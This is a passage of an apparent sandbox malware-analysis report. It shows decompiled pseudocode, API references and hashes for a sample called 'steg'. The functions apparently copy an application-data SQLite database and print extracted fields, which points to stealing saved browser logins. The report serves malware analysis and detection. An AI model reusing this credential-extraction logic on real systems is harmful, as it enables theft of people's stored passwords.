                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3756984125-0
                                                                                                                    • Opcode ID: ad8f61c70eb99b68e000178201a2b036042c6bc6eddace92ec67a90037131b91
                                                                                                                    • Instruction ID: a1294498bafe82f19217514423b9885ff29dca3b785278f21c9f7d208f323c76
                                                                                                                    • Opcode Fuzzy Hash: ad8f61c70eb99b68e000178201a2b036042c6bc6eddace92ec67a90037131b91
                                                                                                                    • Instruction Fuzzy Hash: B6315B71A01198ABDB20BB759C46FAF736CDF45710F140078F90D97202DF399E0AA7A6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8E577 Relevance: 12.2, APIs: 8, Instructions: 245COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 71%
                                                                                                                    			E00F8E577(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v1032;
				char _v1532;
				char _v6532;
				char _v11532;
				char _v21536;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				char _t69;
				void* _t76;
				intOrPtr* _t78;
				signed int _t79;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t87;
				void* _t101;
				intOrPtr* _t115;
				intOrPtr _t125;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr* _t136;
				void* _t139;
				void* _t141;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t146;
				void* _t147;
				signed int _t149;
				signed int _t152;
				void* _t153;
				void* _t155;
				void* _t158;
				void* _t160;

				_t145 = __esi;
				_t144 = __edi;
				_t127 = __ebx;
				_t149 = _t152;
				E00FE7307(0x541c);
				_v8 =  *0x481f80 ^ _t149;
				_v21536 = 0;
				_t60 = E00FE928A( &_v21536, _a4, 0x470890);
				_t153 = _t152 + 0xc;
				if(_t60 != 0) {
					L32:
					__eflags = 0;
					return E00FE72F2(0, _t127, _v8 ^ _t149, _t141, _t144, _t145);
				} else {
					_t63 = _v21536;
					_t162 = _t63;
					if(_t63 == 0) {
						goto L32;
					} else {
						_push(__esi);
						_push(_t63);
						_push(0x1388);
						_push( &_v11532);
						_t146 = 0;
						_t65 = E00FE9087(__ebx, __edi, 0, _t162);
						_t155 = _t153 + 0xc;
						if(_t65 == 0) {
							L31:
							_push(_v21536);
							E00FE9010(_t127, _t144, _t146, _t177);
							_pop(_t147);
							return E00FE72F2(1, _t127, _v8 ^ _t149, _t141, _t144, _t147);
						} else {
							_push(__edi);
							do {
								_t132 =  &_v11532;
								_t141 = _t132 + 1;
								do {
									_t69 =  *_t132;
									_t132 = _t132 + 1;
								} while (_t69 != 0);
								_t133 = _t132 - _t141;
								if(_t133 == 0) {
									L9:
									E00FE7AF9( &_v6532, 0x1388,  &_v11532);
									E00FE8317( &_v6532, 0x1388);
									_t76 = E00FE8487( &_v6532, 0x470894);
									_t158 = _t155 + 0x1c;
									if(_t76 == 0) {
										_t78 = E00FE8487( &_v6532, 0x47089c);
										_t158 = _t158 + 8;
										__eflags = _t78;
										if(_t78 != 0) {
											_v1032 = 0;
											_v520 = 0;
											_v264 = 0;
											_t146 = 1;
										}
										_t40 = _t146 - 1; // 0x0
										_t79 = _t40;
										__eflags = _t79 - 6;
										if(__eflags <= 0) {
											goto ( *((intOrPtr*)(0x40432c + _t79 * 4)));
										}
									} else {
										_t134 =  &_v1032;
										_t141 = _t134 + 1;
										do {
											_t82 =  *_t134;
											_t134 = _t134 + 1;
										} while (_t82 != 0);
										_t135 = _t134 - _t141;
										if(_t135 == 0) {
											L24:
											_v1032 = 0;
											_v520 = 0;
											_v264 = 0;
										} else {
											_t142 =  &_v264;
											_t144 = _t142 + 1;
											do {
												_t83 =  *_t142;
												_t142 = _t142 + 1;
											} while (_t83 != 0);
											_t141 = _t142 - _t144;
											if(_t141 == 0 || _t135 < 1 || _t141 < 1) {
												goto L24;
											} else {
												_t136 =  &_v520;
												_t141 = _t136 + 1;
												do {
													_t84 =  *_t136;
													_t136 = _t136 + 1;
												} while (_t84 != 0);
												if(_t136 - _t141 < 1) {
													goto L24;
												} else {
													E00FE7AF9( &_v1532, 0x1f4, 0x470a20);
													_t87 =  *0x4833ac;
													_t160 = _t158 + 0xc;
													_t176 = _t87;
													if(_t87 != 0) {
														_push( &_v1532);
														_push(0x470aac);
														_push(_t87);
														E00FE92CF(_t127, _t144, _t146, __eflags);
														_push( &_v1032);
														_push(0x470abc);
														_push( *0x4833ac);
														E00FE92CF(_t127, _t144, _t146, __eflags);
														E00FE93E1( *0x4833ac, 0x470acc,  &_v264);
														E00FE93E1( *0x4833ac, 0x470adc,  &_v520);
														_push( *0x4833ac);
														_push(0x470af0);
														E00FE93FA(_t127, _t144, _t146, __eflags);
														_t158 = _t160 + 0x38;
														goto L24;
													} else {
														_push( &_v1032);
														_push( &_v520);
														_push( &_v264);
														_push( &_v1532);
														_push(0x470a8c);
														E00FE9C53(_t127, _t144, _t146, _t176);
														_t158 = _t160 + 0x14;
														_v1032 = 0;
														_v520 = 0;
														_v264 = 0;
													}
												}
											}
										}
									}
									goto L29;
								} else {
									_t139 = _t133 - 1;
									if(_t139 >= 0x1388) {
										_t101 = E00FE7EEC();
										if(__eflags >= 0) {
											 *((intOrPtr*)(_t101 + 0x4c004041)) =  *((intOrPtr*)(_t101 + 0x4c004041)) + _t127;
											 *((intOrPtr*)(_t141 + 0x41)) =  *((intOrPtr*)(_t141 + 0x41)) + _t141;
											 *((intOrPtr*)(_t144 + 0x8004041)) =  *((intOrPtr*)(_t144 + 0x8004041)) + _t127;
											 *_t146 =  *_t146 + _t139 + 1;
											_t141 = _t141 + 2;
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_t125 = E00F8B9C7(_t127, _t141, 0x483320);
											_t155 = _t155 + 4;
											 *0x4833a0 = _t125;
											_t126 = E00F8BDC7(_t127, _t144, _t146);
											 *0x4833a8 = _t126;
											__eflags = _t126;
										}
										if(__eflags != 0) {
											E00F8F1D7();
										}
										E00F8CCF7(_t141, 5);
										E00F8CCF7(_t141, 0xe);
										E00F8CCF7(_t141, 0xd);
										E00F8CCF7(_t141, 0x10);
										E00F8CCF7(_t141, 0x11);
										E00F8D127(__eflags, 7);
										E00F8D127(__eflags, 0xf);
										__eflags =  *0x4833a0 - 7;
										if( *0x4833a0 >= 7) {
											E00F8BF57(_t127, _t141, _t144, _t146);
											E00F8DA77();
											E00F8EB67();
										} else {
											E00F8DF27();
										}
										E00F8D1C7(_t127, _t141);
										E00F8D6C7(_t127, _t141, _t144, _t146);
										E00F8D867(_t127, _t141, _t144, _t146);
										_t115 =  *0x4843b0;
										__eflags = _t115;
										if(_t115 != 0) {
											return  *0x470114(_t115);
										}
										return _t115;
									} else {
										 *((char*)(_t149 + _t139 - 0x2d08)) = _t69;
										goto L9;
									}
								}
								goto L44;
								L29:
								_push(_v21536);
								_push(0x1388);
								_push( &_v11532);
								_t81 = E00FE9087(_t127, _t144, _t146, _t176);
								_t155 = _t158 + 0xc;
								_t177 = _t81;
							} while (_t81 != 0);
							_pop(_t144);
							goto L31;
						}
					}
				}
				L44:
			}













































                                                                                                                    0x00f8e577
                                                                                                                    0x00f8e577
                                                                                                                    0x00f8e577
                                                                                                                    0x00f8e578
                                                                                                                    0x00f8e57f
                                                                                                                    0x00f8e58b
                                                                                                                    0x00f8e59e
                                                                                                                    0x00f8e5a8
                                                                                                                    0x00f8e5ad
                                                                                                                    0x00f8e5b2
                                                                                                                    0x00f8ea8d
                                                                                                                    0x00f8ea92
                                                                                                                    0x00f8ea9c
                                                                                                                    0x00f8e5b8
                                                                                                                    0x00f8e5b8
                                                                                                                    0x00f8e5be
                                                                                                                    0x00f8e5c0
                                                                                                                    0x00000000
                                                                                                                    0x00f8e5c6
                                                                                                                    0x00f8e5c6
                                                                                                                    0x00f8e5c7
                                                                                                                    0x00f8e5ce
                                                                                                                    0x00f8e5d3
                                                                                                                    0x00f8e5d4
                                                                                                                    0x00f8e5d6
                                                                                                                    0x00f8e5db
                                                                                                                    0x00f8e5e0
                                                                                                                    0x00f8ea6b
                                                                                                                    0x00f8ea6b
                                                                                                                    0x00f8ea71
                                                                                                                    0x00f8ea7e
                                                                                                                    0x00f8ea8c
                                                                                                                    0x00f8e5e6
                                                                                                                    0x00f8e5e6
                                                                                                                    0x00f8e5e7
                                                                                                                    0x00f8e5e7
                                                                                                                    0x00f8e5ed
                                                                                                                    0x00f8e5f7
                                                                                                                    0x00f8e5f7
                                                                                                                    0x00f8e5f9
                                                                                                                    0x00f8e5fa
                                                                                                                    0x00f8e5fe
                                                                                                                    0x00f8e600
                                                                                                                    0x00f8e616
                                                                                                                    0x00f8e629
                                                                                                                    0x00f8e63a
                                                                                                                    0x00f8e64b
                                                                                                                    0x00f8e650
                                                                                                                    0x00f8e655
                                                                                                                    0x00f8e7b0
                                                                                                                    0x00f8e7b5
                                                                                                                    0x00f8e7b8
                                                                                                                    0x00f8e7ba
                                                                                                                    0x00f8e7bc
                                                                                                                    0x00f8e7c3
                                                                                                                    0x00f8e7ca
                                                                                                                    0x00f8e7d1
                                                                                                                    0x00f8e7d1
                                                                                                                    0x00f8e7d6
                                                                                                                    0x00f8e7d6
                                                                                                                    0x00f8e7d9
                                                                                                                    0x00f8e7dc
                                                                                                                    0x00f8e7e2
                                                                                                                    0x00f8e7e2
                                                                                                                    0x00f8e65b
                                                                                                                    0x00f8e65b
                                                                                                                    0x00f8e661
                                                                                                                    0x00f8e667
                                                                                                                    0x00f8e667
                                                                                                                    0x00f8e669
                                                                                                                    0x00f8e66a
                                                                                                                    0x00f8e66e
                                                                                                                    0x00f8e670
                                                                                                                    0x00f8e78a
                                                                                                                    0x00f8e78a
                                                                                                                    0x00f8e791
                                                                                                                    0x00f8e798
                                                                                                                    0x00f8e676
                                                                                                                    0x00f8e676
                                                                                                                    0x00f8e67c
                                                                                                                    0x00f8e67f
                                                                                                                    0x00f8e67f
                                                                                                                    0x00f8e681
                                                                                                                    0x00f8e682
                                                                                                                    0x00f8e686
                                                                                                                    0x00f8e688
                                                                                                                    0x00000000
                                                                                                                    0x00f8e6a0
                                                                                                                    0x00f8e6a0
                                                                                                                    0x00f8e6a6
                                                                                                                    0x00f8e6a9
                                                                                                                    0x00f8e6a9
                                                                                                                    0x00f8e6ab
                                                                                                                    0x00f8e6ac
                                                                                                                    0x00f8e6b5
                                                                                                                    0x00000000
                                                                                                                    0x00f8e6bb
                                                                                                                    0x00f8e6cc
                                                                                                                    0x00f8e6d1
                                                                                                                    0x00f8e6d6
                                                                                                                    0x00f8e6d9
                                                                                                                    0x00f8e6db
                                                                                                                    0x00f8e726
                                                                                                                    0x00f8e727
                                                                                                                    0x00f8e72c
                                                                                                                    0x00f8e72d
                                                                                                                    0x00f8e738
                                                                                                                    0x00f8e739
                                                                                                                    0x00f8e73e
                                                                                                                    0x00f8e744
                                                                                                                    0x00f8e75b
                                                                                                                    0x00f8e772
                                                                                                                    0x00f8e777
                                                                                                                    0x00f8e77d
                                                                                                                    0x00f8e782
                                                                                                                    0x00f8e787
                                                                                                                    0x00000000
                                                                                                                    0x00f8e6dd
                                                                                                                    0x00f8e6e3
                                                                                                                    0x00f8e6ea
                                                                                                                    0x00f8e6f1
                                                                                                                    0x00f8e6f8
                                                                                                                    0x00f8e6f9
                                                                                                                    0x00f8e6fe
                                                                                                                    0x00f8e703
                                                                                                                    0x00f8e706
                                                                                                                    0x00f8e70d
                                                                                                                    0x00f8e714
                                                                                                                    0x00f8e714
                                                                                                                    0x00f8e6db
                                                                                                                    0x00f8e6b5
                                                                                                                    0x00f8e688
                                                                                                                    0x00f8e670
                                                                                                                    0x00000000
                                                                                                                    0x00f8e602
                                                                                                                    0x00f8e602
                                                                                                                    0x00f8e609
                                                                                                                    0x00f8ea9d
                                                                                                                    0x00f8eaa3
                                                                                                                    0x00f8eaa6
                                                                                                                    0x00f8eaae
                                                                                                                    0x00f8eab2
                                                                                                                    0x00f8eaba
                                                                                                                    0x00f8eabc
                                                                                                                    0x00f8eac0
                                                                                                                    0x00f8eac1
                                                                                                                    0x00f8eac2
                                                                                                                    0x00f8eac3
                                                                                                                    0x00f8eac4
                                                                                                                    0x00f8eac5
                                                                                                                    0x00f8eac6
                                                                                                                    0x00f8eacc
                                                                                                                    0x00f8ead1
                                                                                                                    0x00f8ead4
                                                                                                                    0x00f8ead9
                                                                                                                    0x00f8eade
                                                                                                                    0x00f8eae3
                                                                                                                    0x00f8eae3
                                                                                                                    0x00f8eae5
                                                                                                                    0x00f8eae7
                                                                                                                    0x00f8eae7
                                                                                                                    0x00f8eaee
                                                                                                                    0x00f8eaf5
                                                                                                                    0x00f8eafc
                                                                                                                    0x00f8eb03
                                                                                                                    0x00f8eb0a
                                                                                                                    0x00f8eb11
                                                                                                                    0x00f8eb18
                                                                                                                    0x00f8eb20
                                                                                                                    0x00f8eb27
                                                                                                                    0x00f8eb30
                                                                                                                    0x00f8eb35
                                                                                                                    0x00f8eb3a
                                                                                                                    0x00f8eb29
                                                                                                                    0x00f8eb29
                                                                                                                    0x00f8eb29
                                                                                                                    0x00f8eb3f
                                                                                                                    0x00f8eb44
                                                                                                                    0x00f8eb49
                                                                                                                    0x00f8eb4e
                                                                                                                    0x00f8eb53
                                                                                                                    0x00f8eb55
                                                                                                                    0x00000000
                                                                                                                    0x00f8eb58
                                                                                                                    0x00f8eb5e
                                                                                                                    0x00f8e60f
                                                                                                                    0x00f8e60f
                                                                                                                    0x00000000
                                                                                                                    0x00f8e60f
                                                                                                                    0x00f8e609
                                                                                                                    0x00000000
                                                                                                                    0x00f8ea48
                                                                                                                    0x00f8ea48
                                                                                                                    0x00f8ea54
                                                                                                                    0x00f8ea59
                                                                                                                    0x00f8ea5a
                                                                                                                    0x00f8ea5f
                                                                                                                    0x00f8ea62
                                                                                                                    0x00f8ea62
                                                                                                                    0x00f8ea6a
                                                                                                                    0x00000000
                                                                                                                    0x00f8ea6a
                                                                                                                    0x00f8e5e0
                                                                                                                    0x00f8e5c0
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 00F8E5A8
                                                                                                                    • _fgets.LIBCMT ref: 00F8E5D6
                                                                                                                    • _strstr.LIBCMT ref: 00F8E64B
                                                                                                                    • _wprintf.LIBCMT ref: 00F8E6FE
                                                                                                                    • _fprintf.LIBCMT ref: 00F8E72D
                                                                                                                    • _fprintf.LIBCMT ref: 00F8E744
                                                                                                                      • Part of subcall function 00FE92CF: __lock_file.LIBCMT ref: 00FE9316
                                                                                                                      • Part of subcall function 00FE92CF: __stbuf.LIBCMT ref: 00FE939B
                                                                                                                      • Part of subcall function 00FE92CF: __ftbuf.LIBCMT ref: 00FE93B7
                                                                                                                      • Part of subcall function 00FE93E1: __vfwprintf_l.LIBCMT ref: 00FE93F0
                                                                                                                    • _fgets.LIBCMT ref: 00F8EA5A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fgets_fprintf$__ftbuf__lock_file__stbuf__vfwprintf_l__wfopen_s_strstr_wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2011453255-0
                                                                                                                    • Opcode ID: e0f2eb0771321eaa3f37b203fa31ef19375705b1c427191b4a91fdcd7f1b31b7
                                                                                                                    • Instruction ID: 9ca768fe88d73c15f6b4ea37bf0317f78483c74c762b24797614b2b061401002
                                                                                                                    • Opcode Fuzzy Hash: e0f2eb0771321eaa3f37b203fa31ef19375705b1c427191b4a91fdcd7f1b31b7
                                                                                                                    • Instruction Fuzzy Hash: 97814D709443859EDF10FB70CC46BED7768AF11704F0440E9FA49A7083EAB99B85AF61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FB6977 Relevance: 11.3, Strings: 9, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00FB6977(intOrPtr* _a4) {
				void* _t4;
				signed char _t6;
				signed int _t11;
				intOrPtr* _t13;

				_t13 = _a4;
				_t11 = 0;
				_t4 = 0x63;
				if(_t13 == 0) {
					L26:
					return _t4;
				} else {
					_t6 =  *_t13;
					if(_t6 == 0) {
						goto L26;
					} else {
						do {
							_t11 = (_t11 << 8) + ( *((_t6 & 0x000000ff) + 0x472f30) & 0x000000ff);
							_t13 = _t13 + 1;
							if(_t11 != 0x63686172) {
								if(_t11 != 0x636c6f62) {
									if(_t11 != 0x74657874) {
										if(_t11 != 0x626c6f62) {
											if(_t11 != 0x7265616c) {
												if(_t11 != 0x666c6f61) {
													if(_t11 != 0x646f7562 || _t4 != 0x63) {
														goto L22;
													} else {
														_t4 = 0x65;
													}
												} else {
													if(_t4 != 0x63) {
														goto L22;
													} else {
														_t4 = 0x65;
													}
												}
											} else {
												if(_t4 != 0x63) {
													goto L22;
												} else {
													_t4 = 0x65;
												}
											}
										} else {
											if(_t4 == 0x63 || _t4 == 0x65) {
												_t4 = 0x62;
											} else {
												L22:
												if((_t11 & "CreateTable") == 0x696e74) {
													return 0x64;
												}
											}
										}
									} else {
										_t4 = 0x61;
									}
								} else {
									_t4 = 0x61;
								}
							} else {
								_t4 = 0x61;
							}
							_t6 =  *_t13;
						} while (_t6 != 0);
						return _t4;
					}
				}
			}







                                                                                                                    0x00fb697b
                                                                                                                    0x00fb697e
                                                                                                                    0x00fb6980
                                                                                                                    0x00fb6984
                                                                                                                    0x00fb6a32
                                                                                                                    0x00fb6a32
                                                                                                                    0x00fb698a
                                                                                                                    0x00fb698a
                                                                                                                    0x00fb698e
                                                                                                                    0x00000000
                                                                                                                    0x00fb6997
                                                                                                                    0x00fb6997
                                                                                                                    0x00fb69a4
                                                                                                                    0x00fb69a6
                                                                                                                    0x00fb69af
                                                                                                                    0x00fb69bb
                                                                                                                    0x00fb69c7
                                                                                                                    0x00fb69d3
                                                                                                                    0x00fb69e7
                                                                                                                    0x00fb69f7
                                                                                                                    0x00fb6a07
                                                                                                                    0x00000000
                                                                                                                    0x00fb6a0d
                                                                                                                    0x00fb6a0d
                                                                                                                    0x00fb6a0d
                                                                                                                    0x00fb69f9
                                                                                                                    0x00fb69fb
                                                                                                                    0x00000000
                                                                                                                    0x00fb69fd
                                                                                                                    0x00fb69fd
                                                                                                                    0x00fb69fd
                                                                                                                    0x00fb69fb
                                                                                                                    0x00fb69e9
                                                                                                                    0x00fb69eb
                                                                                                                    0x00000000
                                                                                                                    0x00fb69ed
                                                                                                                    0x00fb69ed
                                                                                                                    0x00fb69ed
                                                                                                                    0x00fb69eb
                                                                                                                    0x00fb69d5
                                                                                                                    0x00fb69d7
                                                                                                                    0x00fb69dd
                                                                                                                    0x00fb6a11
                                                                                                                    0x00fb6a11
                                                                                                                    0x00fb6a1f
                                                                                                                    0x00000000
                                                                                                                    0x00fb6a2e
                                                                                                                    0x00fb6a1f
                                                                                                                    0x00fb69d7
                                                                                                                    0x00fb69c9
                                                                                                                    0x00fb69c9
                                                                                                                    0x00fb69c9
                                                                                                                    0x00fb69bd
                                                                                                                    0x00fb69bd
                                                                                                                    0x00fb69bd
                                                                                                                    0x00fb69b1
                                                                                                                    0x00fb69b1
                                                                                                                    0x00fb69b1
                                                                                                                    0x00fb6a21
                                                                                                                    0x00fb6a23
                                                                                                                    0x00fb6a2d
                                                                                                                    0x00fb6a2d
                                                                                                                    0x00fb698e

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CreateTable$aolf$bolb$bolc$buod$laer$rahc$tni$txet
                                                                                                                    • API String ID: 0-2418735592
                                                                                                                    • Opcode ID: 193eda4ff26643cb186817329ffe3e6c0bab4abed965136141e6db746d9bbf84
                                                                                                                    • Instruction ID: 01dfdddb1785e31c9e43d2c4d3ae9aa7a18aeaf1d352225dc27ae4954d6dd2fb
                                                                                                                    • Opcode Fuzzy Hash: 193eda4ff26643cb186817329ffe3e6c0bab4abed965136141e6db746d9bbf84
                                                                                                                    • Instruction Fuzzy Hash: 6211A029DD8114028D305C5B84902F96FEE499373CB78D017C5A6FB60ACA2D4C837E52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8D1C7 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 339COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E00F8D1C7(void* __ebx, void* __edx) {
				signed int _v8;
				void* _v12;
				char _v36;
				char _v153;
				char _v154;
				short _v156;
				char _v164;
				void _v216;
				char _v736;
				char _v855;
				char _v856;
				char _v864;
				char _v1364;
				char _v2364;
				char _v2884;
				char _v3908;
				char _v4932;
				signed int _v4936;
				char _v4940;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t91;
				void* _t99;
				signed int _t103;
				signed int _t110;
				signed int _t118;
				char* _t119;
				signed int _t120;
				void* _t123;
				void* _t132;
				signed int _t134;
				intOrPtr* _t135;
				signed int _t137;
				signed int _t140;
				signed int _t159;
				void* _t171;
				intOrPtr* _t178;
				void* _t179;
				intOrPtr* _t181;
				intOrPtr* _t184;
				signed int _t186;
				intOrPtr* _t187;
				intOrPtr* _t190;
				void* _t191;
				void* _t194;
				void* _t199;
				intOrPtr* _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				signed int _t206;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t219;
				void* _t220;
				void* _t221;

				_t194 = __edx;
				_t173 = __ebx;
				E00FE7307(0x1348);
				_v8 =  *0x481f80 ^ _t206;
				asm("movq xmm0, [0x470728]");
				_v856 =  *0x470730 & 0x000000ff;
				asm("movq [ebp-0x35c], xmm0");
				E00FE7C87( &_v855, 0, 0x77);
				asm("movq xmm0, [0x470734]");
				_v156 =  *0x47073c & 0x0000ffff;
				_v154 =  *0x47073e & 0x000000ff;
				asm("movq [ebp-0xa0], xmm0");
				E00FE7C87( &_v153, 0, 0x75);
				asm("movq xmm0, [0x470774]");
				_t203 = 0x470740;
				_t91 = memcpy( &_v216, 0x470740, 0xc << 2);
				_t209 = _t207 + 0x24;
				_v12 = _t91;
				_push( &_v736);
				_push(0);
				asm("movq [ebp-0x20], xmm0");
				asm("movq xmm0, [0x47077c]");
				_push(0);
				asm("movq [ebp-0x18], xmm0");
				asm("movq xmm0, [0x470784]");
				_push(0x1c);
				_push(0);
				_v4940 = 0;
				_v4936 = 0;
				asm("movsw");
				asm("movq [ebp-0x10], xmm0");
				if( *0x470200() < 0) {
					L38:
					_pop(_t199);
					__eflags = _v8 ^ _t206;
					_pop(_t204);
					return E00FE72F2(_t93, _t173, _v8 ^ _t206, _t194, _t199, _t204);
				} else {
					E00FE7B4E( &_v736, 0x208,  &_v36);
					_t99 = E00F8BD87( &_v736);
					_t210 = _t209 + 0x10;
					if(_t99 != 0) {
						E00FE7AF9( &_v2884, 0x208,  &_v736);
						_t178 =  &_v736;
						_t211 = _t210 + 0xc;
						_t194 = _t178 + 1;
						do {
							_t103 =  *_t178;
							_t178 = _t178 + 1;
							__eflags = _t103;
						} while (_t103 != 0);
						_t179 = _t178 - _t194;
						__eflags =  *((char*)(_t206 + _t179 - 0x2dd)) - 0x5c;
						if( *((char*)(_t206 + _t179 - 0x2dd)) != 0x5c) {
							E00FE7B4E( &_v736, 0x208, 0x470790);
							E00FE7B4E( &_v736, 0x208,  &_v164);
							_t212 = _t211 + 0x18;
						} else {
							E00FE7B4E( &_v736, 0x208,  &_v164);
							_t212 = _t211 + 0xc;
						}
						_t110 = E00F8BDA7( &_v736);
						_t213 = _t212 + 4;
						__eflags = _t110;
						if(_t110 == 0) {
							E00FE7AF9( &_v736, 0x208,  &_v2884);
							E00FE7AF9( &_v164, 0x80,  &_v864);
							_t190 =  &_v736;
							_t221 = _t213 + 0x18;
							_t194 = _t190 + 1;
							do {
								_t159 =  *_t190;
								_t190 = _t190 + 1;
								__eflags = _t159;
							} while (_t159 != 0);
							_t191 = _t190 - _t194;
							__eflags =  *((char*)(_t206 + _t191 - 0x2dd)) - 0x5c;
							if( *((char*)(_t206 + _t191 - 0x2dd)) != 0x5c) {
								E00FE7B4E( &_v736, 0x208, 0x470790);
								E00FE7B4E( &_v736, 0x208,  &_v164);
								_t213 = _t221 + 0x18;
							} else {
								E00FE7B4E( &_v736, 0x208,  &_v164);
								_t213 = _t221 + 0xc;
							}
						}
						 *0x4700e8(0x3e8,  &_v2364);
						E00FE7B4E( &_v2364, 0x3e8,  &_v164);
						_t214 = _t213 + 0xc;
						_t118 =  *0x4700a4( &_v736,  &_v2364, 0);
						__eflags = _t118;
						if(_t118 != 0) {
							_t119 =  &_v2364;
						} else {
							 *0x470124();
							_t119 =  &_v736;
						}
						_push(0);
						_push(1);
						_t93 = E00F97A57(_t119,  &_v4940);
						_t215 = _t214 + 0x10;
						__eflags = _t93;
						if(_t93 == 0) {
							_t181 =  &_v216;
							_t194 = _t181 + 1;
							do {
								_t120 =  *_t181;
								_t181 = _t181 + 1;
								__eflags = _t120;
							} while (_t120 != 0);
							_t93 = E00F97D07(_v4940,  &_v216, _t181 - _t194,  &_v4936, 0);
							_t216 = _t215 + 0x14;
							__eflags = _t93;
							if(_t93 == 0) {
								_t93 = _v4936;
								__eflags = _t93;
								if(_t93 != 0) {
									_t123 = E00F98C87(_t93);
									_t217 = _t216 + 4;
									__eflags = _t123 - 0x65;
									if(_t123 != 0x65) {
										while(1) {
											__eflags = _t123 - 0x64;
											if(_t123 != 0x64) {
												goto L37;
											}
											E00FE7AF9( &_v3908, 0x400, E00F991D7(_v4936, 1));
											_t200 = E00F991D7(_v4936, 3);
											_t203 = E00F98DE7(_v4936, 5);
											_t132 = E00F98EF7(_v4936, 5);
											_push(0x400);
											E00F8BEF7(_t131, _t132,  &_v4932);
											_t184 =  &_v3908;
											_t219 = _t217 + 0x3c;
											_t194 = _t184 + 1;
											do {
												_t134 =  *_t184;
												_t184 = _t184 + 1;
												__eflags = _t134;
											} while (_t134 != 0);
											__eflags = _t184 - _t194 - 1;
											if(_t184 - _t194 >= 1) {
												_t135 = _t200;
												_t64 = _t135 + 1; // 0x1
												_t194 = _t64;
												do {
													_t186 =  *_t135;
													_t135 = _t135 + 1;
													__eflags = _t186;
												} while (_t186 != 0);
												__eflags = _t135 - _t194 - 1;
												if(_t135 - _t194 >= 1) {
													_t187 =  &_v4932;
													_t194 = _t187 + 1;
													do {
														_t137 =  *_t187;
														_t187 = _t187 + 1;
														__eflags = _t137;
													} while (_t137 != 0);
													__eflags = _t187 - _t194 - 1;
													if(_t187 - _t194 >= 1) {
														E00FE7AF9( &_v1364, 0x1f4, 0x470a30);
														_t140 =  *0x4833ac;
														_t220 = _t219 + 0xc;
														__eflags = _t140;
														if(__eflags != 0) {
															_push( &_v1364);
															_push(0x470aac);
															_push(_t140);
															E00FE92CF(_t173, _t200, _t203, __eflags);
															_push( &_v3908);
															_push(0x470abc);
															_push( *0x4833ac);
															E00FE92CF(_t173, _t200, _t203, __eflags);
															E00FE93E1( *0x4833ac, 0x470acc, _t200);
															E00FE93E1( *0x4833ac, 0x470adc,  &_v4932);
															_push( *0x4833ac);
															_push(0x470af0);
															E00FE93FA(_t173, _t200, _t203, __eflags);
															_t219 = _t220 + 0x38;
														} else {
															_push( &_v3908);
															_push( &_v4932);
															_push(_t200);
															_push( &_v1364);
															_push(0x470a8c);
															E00FE9C53(_t173, _t200, _t203, __eflags);
															_t219 = _t220 + 0x14;
														}
													}
												}
											}
											_t123 = E00F98C87(_v4936);
											_t217 = _t219 + 4;
											__eflags = _t123 - 0x65;
											if(_t123 != 0x65) {
												continue;
											}
											goto L37;
										}
									}
									L37:
									E00F99387(_v4936);
									E00F94A77(_t173, _t203, _v4940);
									_t93 =  *0x4700e4( &_v2364);
								}
							}
						}
						goto L38;
					} else {
						_t171 =  *0x470124();
						_pop(_t201);
						_pop(_t205);
						return E00FE72F2(_t171, __ebx, _v8 ^ _t206, _t194, _t201, _t205);
					}
				}
			}




































































                                                                                                                    0x00f8d1c7
                                                                                                                    0x00f8d1c7
                                                                                                                    0x00f8d1cf
                                                                                                                    0x00f8d1db
                                                                                                                    0x00f8d1e5
                                                                                                                    0x00f8d1f1
                                                                                                                    0x00f8d200
                                                                                                                    0x00f8d208
                                                                                                                    0x00f8d214
                                                                                                                    0x00f8d21c
                                                                                                                    0x00f8d22c
                                                                                                                    0x00f8d23b
                                                                                                                    0x00f8d243
